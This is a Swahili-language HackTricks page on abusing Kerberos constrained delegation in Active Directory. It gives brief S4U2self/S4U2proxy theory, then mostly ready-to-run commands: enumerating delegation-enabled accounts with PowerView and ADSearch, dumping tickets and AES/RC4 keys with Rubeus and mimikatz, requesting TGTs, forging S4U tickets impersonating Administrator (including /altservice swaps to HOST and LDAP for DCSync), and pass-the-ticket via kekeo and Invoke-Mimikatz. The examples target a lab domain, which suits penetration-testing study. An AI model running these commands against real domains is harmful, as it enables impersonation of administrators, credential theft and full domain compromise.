Swahili - Ht
HackTricks Training Twitter Linkedin Sponsor

Constrained Delegation

Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Kizuizi cha Utekelezaji

Kwa kutumia hii, msimamizi wa kikoa anaweza kuruhusu kompyuta kujifanya kuwa mtumiaji au kompyuta dhidi ya huduma ya kifaa.

  • Huduma kwa Mtumiaji mwenyewe (S4U2self): Ikiwa akaunti ya huduma ina thamani ya userAccountControl inayojumuisha TRUSTED_TO_AUTH_FOR_DELEGATION (T2A4D), basi inaweza kupata TGS kwa niaba yake (huduma) kwa niaba ya mtumiaji mwingine yeyote.

  • Huduma kwa Mwakilishi wa Mtumiaji(S4U2proxy): Akaunti ya huduma inaweza kupata TGS kwa niaba ya mtumiaji yeyote kwa huduma iliyoainishwa katika msDS-AllowedToDelegateTo. Ili kufanya hivyo, kwanza inahitaji TGS kutoka kwa mtumiaji huyo kwake mwenyewe, lakini inaweza kutumia S4U2self kupata TGS hiyo kabla ya kuomba nyingine.

Note: Ikiwa mtumiaji ameandikwa kama 'Akaunti ni nyeti na haiwezi kupelekwa ' katika AD, hautaweza kujifanya kuwa wao.

Hii inamaanisha kuwa ikiwa unafanikiwa kudukua hash ya huduma unaweza kujifanya kuwa watumiaji na kupata upatikanaji kwa niaba yao kwenye huduma iliyowekwa (uwezekano wa privesc).

Zaidi ya hayo, hautakuwa na upatikanaji tu kwa huduma ambayo mtumiaji anaweza kujifanya kuwa, lakini pia kwa huduma yoyote kwa sababu jina la SPN (jina la huduma inayohitajika) halijachunguzwa, bali haki tu. Kwa hivyo, ikiwa una upatikanaji wa huduma ya CIFS unaweza pia kupata upatikanaji wa huduma ya HOST kwa kutumia bendera ya /altservice katika Rubeus.

Pia, upatikanaji wa huduma ya LDAP kwenye DC, ndio unahitajika kudukua DCSync.

Tambua
# Powerview
Get-DomainUser -TrustedToAuth | select userprincipalname, name, msds-allowedtodelegateto
Get-DomainComputer -TrustedToAuth | select userprincipalname, name, msds-allowedtodelegateto

#ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes cn,dnshostname,samaccountname,msds-allowedtodelegateto --json
Pata TGT
# The first step is to get a TGT of the service that can impersonate others
## If you are SYSTEM in the server, you might take it from memory
.\Rubeus.exe triage
.\Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap

# If you are SYSTEM, you might get the AES key or the RC4 hash from memory and request one
## Get AES/RC4 with mimikatz
mimikatz sekurlsa::ekeys

## Request with aes
tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05
.\Rubeus.exe asktgt /user:dcorp-adminsrv$ /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05 /opsec /nowrap

# Request with RC4
tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d
.\Rubeus.exe asktgt /user:dcorp-adminsrv$ /rc4:cc098f204c5887eaa8253e7c2749156f /outfile:TGT_websvc.kirbi

Kuna njia nyingine za kupata tiketi ya TGT au RC4 au AES256 bila kuwa SYSTEM kwenye kompyuta kama kosa la Printer na kutozuia utekelezaji, kusambaza NTLM na unyanyasaji wa Huduma ya Cheti ya Active Directory.

Kwa kuwa na tiketi ya TGT (au iliyohashwa) unaweza kufanya shambulio hili bila kuhatarisha kompyuta nzima.

Kutumia Rubeus
#Obtain a TGS of the Administrator user to self
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /impersonateuser:Administrator /outfile:TGS_administrator

#Obtain service TGS impersonating Administrator (CIFS)
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /outfile:TGS_administrator_CIFS

#Impersonate Administrator on different service (HOST)
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /altservice:HOST /outfile:TGS_administrator_HOST

# Get S4U TGS + Service impersonated ticket in 1 cmd (instead of 2)
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /user:dcorp-adminsrv$ /ticket:TGT_websvc.kirbi /nowrap

#Load ticket in memory
.\Rubeus.exe ptt /ticket:TGS_administrator_CIFS_HOST-dcorp-mssql.dollarcorp.moneycorp.local
kekeo + Mimikatz
#Obtain a TGT for the Constained allowed user
tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d

#Get a TGS for the service you are allowed (in this case time) and for other one (in this case LDAP)
tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLAR CORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL

#Load the TGS in memory
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~ dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'

Maelezo zaidi katika ired.team.

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

PreviousBloodHound & Other AD Enum ToolsNextCustom SSP

Last updated